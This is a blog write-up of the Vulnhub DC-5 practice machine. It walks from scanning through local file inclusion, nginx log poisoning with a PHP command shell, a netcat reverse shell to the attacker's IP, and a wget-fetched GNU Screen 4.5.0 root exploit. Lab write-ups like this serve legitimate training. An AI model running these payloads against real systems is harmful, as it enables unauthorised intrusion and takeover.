Post

Write-up DC5 on Vulnhub

There are 9 DC machines available on Vulnhub and today I love to share the writeup of the fifth machine in this awesomd serie. Since I am preparing for the OSCP exam I like to practice as much as possible. Some machines I do while I am travelling and I am not connected to the internet. That’s why I love vulnerable (virtual) machines. The machine can be downloaded from Vulnhub. After downloading the virtual machine, you have to configure the machine so it is on the same network as your Kali machine.

Getting started

First create a working directory for this Vulnhub machine.

1
2
┌──(emvee㉿kali)-[~/Documents/Vulnhub]
└─$ mcd DC-5

Now I would like to know my own IP address.

1
2
3
4
5
6
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ myip    

    inet 127.0.0.1
    inet 10.0.2.15

Since I know my IP address it is time to identify other IP addresses in my virtual network. The first command I use is with fping.

1
2
3
4
5
6
7
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ fping -ag 10.0.2.0/24 2> /dev/null
10.0.2.1
10.0.2.2
10.0.2.3
10.0.2.15
10.0.2.34

Another method to identify IP addresses on my network is with arp-scan. I normally use arp-scan as second method since the results could be different.

1
2
3
4
5
6
7
8
9
10
11
12
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ sudo arp-scan --localnet        
[sudo] password for emvee: 
Interface: eth0, type: EN10MB, MAC: 08:00:27:e0:29:f9, IPv4: 10.0.2.15
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.2.1        52:54:00:12:35:00       QEMU
10.0.2.2        52:54:00:12:35:00       QEMU
10.0.2.3        08:00:27:45:23:77       PCS Systemtechnik GmbH
10.0.2.34       08:00:27:e3:20:d6       PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.027 seconds (126.30 hosts/sec). 4 responded

There is a new IP address in my virtual network. Now let’s create a variable called ip which has the IP address of the target assigned.

1
2
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ ip=10.0.2.34

Enumeration

Now let’s start with a basic port scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ nmap -sC -p- $ip -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 15:27 CEST
Nmap scan report for 10.0.2.34
Host is up (0.00020s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
|_http-title: Welcome
111/tcp   open  rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33567/tcp   status
|   100024  1          37062/tcp6  status
|   100024  1          42799/udp   status
|_  100024  1          43311/udp6  status
33567/tcp open  status

Nmap done: 1 IP address (1 host up) scanned in 2.12 seconds

There are three ports open

  • Port 80
    • HTTP
  • Port 111
    • RPC
  • Port 33567
    • No idea what is running here yet

Let’s enumerate first the webservice with whatweb and followed by nikto.

1
2
3
4
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ whatweb http://$ip
http://10.0.2.34 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.6.2], IP[10.0.2.34], Title[Welcome], nginx[1.6.2]

Some information has been discovered, so update our ntoes again:

  • nginx 1.6.2
  • Title: Welcome

Now start nikto to identify some more information and perhaps even a vulnerability.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ nikto -h http://$ip 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.2.34
+ Target Hostname:    10.0.2.34
+ Target Port:        80
+ Start Time:         2023-03-27 15:29:17 (GMT2)
---------------------------------------------------------------------------
+ Server: nginx/1.6.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7915 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2023-03-27 15:29:38 (GMT2) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nothing new found. Let’s see what files and directories can be found using dirb and dirsearch.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ dirb http://$ip                         

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Mar 27 15:32:39 2023
URL_BASE: http://10.0.2.34/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.0.2.34/ ----
==> DIRECTORY: http://10.0.2.34/css/                                                                                                                                                                                                      
==> DIRECTORY: http://10.0.2.34/images/                                                                                                                                                                                                   
+ http://10.0.2.34/index.php (CODE:200|SIZE:4025) 

---- Entering directory: http://10.0.2.34/css/ ----
---- Entering directory: http://10.0.2.34/images/ ----

-----------------
END_TIME: Mon Mar 27 15:32:42 2023
DOWNLOADED: 13836 - FOUND: 1

Some basic directories of a website are found. Now let’s enumerate some files. Perhaps something interesting could be found.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ dirsearch -u http://$ip -e php,txt,html 

  _|. _ _  _  _  _ _|_    v0.4.2                                                         (_||| _) (/_(_|| (_| )  
 
Extensions: php, txt, html | HTTP method: GET | Threads: 30 | Wordlist size: 9901

Output File: /home/emvee/.dirsearch/reports/10.0.2.34/_23-03-27_15-33-00.txt

Error Log: /home/emvee/.dirsearch/logs/errors-23-03-27_15-33-00.log

Target: http://10.0.2.34/

[15:33:00] Starting: 
[15:33:15] 200 -    4KB - /contact.php                                      
[15:33:15] 301 -  184B  - /css  ->  http://10.0.2.34/css/                   
[15:33:18] 200 -    6KB - /faq.php                                          
[15:33:18] 200 -   17B  - /footer.php                                       
[15:33:20] 301 -  184B  - /images  ->  http://10.0.2.34/images/             
[15:33:20] 403 -  570B  - /images/
[15:33:20] 200 -    4KB - /index.php                                        
[15:33:36] 200 -  852B  - /thankyou.php  

Task Completed 

Some interesting files are shown such as footer.php and contact.php. Now open a webbrowser and navigate to the website.

Image

Let’s browse the websit eto see if we can find something useful.

Image

1
http://10.0.2.34/thankyou.php?firstname=&lastname=&country=australia&subject=

What if we change the argument to file=../../../../etc/passwd to see if we can include another file.

1
http://10.0.2.34/thankyou.php?file=../../../../etc/passwd

Image

It looks like we have identified a local file inclusion vulnerability ( #LFI #Local-File-Inclusion)

Press CTRL + U to view the source code. This will help us copy the content of /etc/passwd much easier.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
dc:x:1000:1000:dc,,,:/home/dc:/bin/bash
mysql:x:108:113:MySQL Server,,,:/nonexistent:/bin/false

If the webapplication has a LFI vulnerability, it might be logging some details in the nginx log file. If this is the case, we might have the opportunity to inject PHP code. It are a lot of if's, but if this is working we might have luck and gain a reverse shell. This vulnerability is called Log Poisoning as well. #Log-Poisoning

Now let’s use our Google Fu to find where the logging is stored for nginx

1
https://www.google.com/search?q=nginx+access+log+location+linux
1
By default, the access log is located at **/var/log/nginx/access.** **log** , and the information is written to the log in the predefined combined format.

So let’s try to open the access.log file in the webbrowser.

1
http://10.0.2.34/thankyou.php?file=/var/log/nginx/access.log

Image

It alerts me with the IP address of the host. Perhaps some old logging is stored with an XSS vulnerability.

Now let’s try to poison the logging.

1
<?php system($_GET['cmd']) ?>

Image

This will probably inject the PHP code into the error.log file.

Image

Now let’s try the cmd to exploit withing the error.log file.

1
http://10.0.2.34/thankyou.php?file=../../../../../..//var/log/nginx/error.log&cmd=id

Image

Now we have to start a netcat listener first.

1
2
3
4
5
6
7
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ sudo nc -lvp 53           
[sudo] password for emvee: 
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53

As soon as the netcat listener is listening to any incomminc connection we have to trigger the reverse shell.

1
10.0.2.34/thankyou.php?file=../../../../../../var/log/nginx/error.log&cmd=nc -e /bin/bash 10.0.2.15 53

Image

Forward the request within Burp Suite and watch the netcat listener.

Initial access

After forwarding the request we should return to our netcat listener.

1
2
3
4
5
6
7
8
9
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ sudo nc -lvp 53           
[sudo] password for emvee: 
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 10.0.2.34.
Ncat: Connection from 10.0.2.34:45823.

A connection has been established from our target. Now found out who we are.

1
2
3
4
5
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
dc-5

Okay, first things first… upgrade the shell a bit.

1
2
3
4
5
6
7
8
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-5:~/html$ 
www-data@dc-5:~/html$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
<r/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp                   
www-data@dc-5:~/html$ export TERM=xterm-256color  
export TERM=xterm-256color  
www-data@dc-5:~/html$ alias ll='ls -lsaht --color=auto'  
alias ll='ls -lsaht --color=auto'  

Now we should background the process for a while with CTRL + Z.

1
2
www-data@dc-5:~/html$ ^Z
zsh: suspended  sudo nc -lvp 53

Now we should continue with the upgrading of the shell again.

1
2
3
4
5
6
7
8
9
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ stty raw -echo ; fg ; reset  
[1]  + continued  sudo nc -lvp 53


www-data@dc-5:~/html$ stty columns 200 rows 200
stty columns 200 rows 200
www-data@dc-5:~/html$ 

Now let’s check the Linux distro and kernel first.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
www-data@dc-5:~/html$ uname -a
uname -a
Linux dc-5 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64 GNU/Linux
www-data@dc-5:~/html$ uname -mrs
uname -mrs
Linux 3.16.0-4-amd64 x86_64
www-data@dc-5:~/html$ cat /proc/version
cat /proc/version
Linux version 3.16.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.51-2 (2017-12-03)
www-data@dc-5:~/html$ cat /etc/issue
cat /etc/issue
Debian GNU/Linux 8 \n \l

www-data@dc-5:~/html$ cat /etc/*-release
cat /etc/*-release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
www-data@dc-5:~/html$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 8.10 (jessie)
Release:        8.10
Codename:       jessie

We now have identified the Linux version and Kernel version. Let’s enumerate the users on the system as well.

1
2
3
4
5
www-data@dc-5:~/html$ awk -F: '($3>=1000)&&($1!="nobody"){print $1}' /etc/passwd
awk -F: '($3>=1000)&&($1!="nobody"){print $1}' /etc/passwd
dc
www-data@dc-5:~/html$ 

Okay, there is one user on the system, let’s enumerate the home directory of the dc user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
www-data@dc-5:~/html$ ls /home -ahlR
ls /home -ahlR
/home:
total 12K
drwxr-xr-x  3 root root 4.0K Apr 19  2019 .
drwxr-xr-x 23 root root 4.0K Apr 19  2019 ..
drwxr-xr-x  2 dc   dc   4.0K Apr 20  2019 dc

/home/dc:
total 24K
drwxr-xr-x 2 dc   dc   4.0K Apr 20  2019 .
drwxr-xr-x 3 root root 4.0K Apr 19  2019 ..
-rw------- 1 dc   dc     10 Apr 20  2019 .bash_history
-rw-r--r-- 1 dc   dc    220 Apr 19  2019 .bash_logout
-rw-r--r-- 1 dc   dc   3.5K Apr 19  2019 .bashrc
-rw-r--r-- 1 dc   dc    67

There is nothing in the home directory of the user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@dc-5:~/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs
www-data@dc-5:~/html$ 

In the results there is something called screen-4.5.0 which point out to me directly. Let’s find out if this version is vulnerable.

1
2
3
4
5
6
7
8
9
10
11
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ searchsploit screen 4.5.0
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation                                                                                                                                                             | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)                                                                                                                                                       | linux/local/41152.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

It looks like there is a known privilege escalation vulnerability available. Now copy the exploit to our working directory.

1
2
3
4
5
6
7
8
9
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ searchsploit -m 41154    
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/41154
     Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
    Codes: N/A
 Verified: True
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /home/emvee/Documents/Vulnhub/DC-5/41154.sh

And then host the exploit on our local python webserver.

1
2
3
4
┌──(emvee㉿kali)-[~/Documents/Vulnhub/DC-5]
└─$ sudo python3 -m http.server 80
[sudo] password for emvee: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Change the working directory to /tmp on the victim and download the exploit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
www-data@dc-5:/tmp$ wget http://10.0.2.15/41154.sh
wget http://10.0.2.15/41154.sh
converted 'http://10.0.2.15/41154.sh' (ANSI_X3.4-1968) -> 'http://10.0.2.15/41154.sh' (UTF-8)
--2023-03-28 02:30:13--  http://10.0.2.15/41154.sh
Connecting to 10.0.2.15:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K) [text/x-sh]
Saving to: '41154.sh'

41154.sh                                          100%[===============================================================================================================>]   1.12K  --.-KB/s   in 0s     

2023-03-28 02:30:13 (332 MB/s) - '41154.sh' saved [1149/1149]

www-data@dc-5:/tmp$ chmod +x 41154.sh
chmod +x 41154.sh

Privilege escalation

Now run the exploit.

1
2
3
4
5
6
7
8
9
10
11
www-data@dc-5:/tmp$ ./41154.sh
./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# 

It looks like it worked, let’s check this with the command whoami;id;hostname.

1
2
3
4
5
# whoami;id;hostname
whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root),33(www-data)
dc-5

We are root on DC-5. Not change the working directory to the /root directory. And find out how the flag is called on this machine.

1
2
3
4
5
# cd /root
cd /root
# ls
ls
thisistheflag.txt

Now we only have to capture the full proof with the OSCP method.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# whoami;id;hostname;ifconfig;cat thisistheflag.txt
whoami;id;hostname;ifconfig;cat thisistheflag.txt
root
uid=0(root) gid=0(root) groups=0(root),33(www-data)
dc-5
eth0      Link encap:Ethernet  HWaddr 08:00:27:e3:20:d6  
          inet addr:10.0.2.34  Bcast:10.0.2.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fee3:20d6/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:113993 errors:0 dropped:0 overruns:0 frame:0
          TX packets:111432 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:17491790 (16.6 MiB)  TX bytes:38282345 (36.5 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)



888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 
                                                                                          
                                                                                          


Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

# 

This post is licensed under CC BY 4.0 by the author.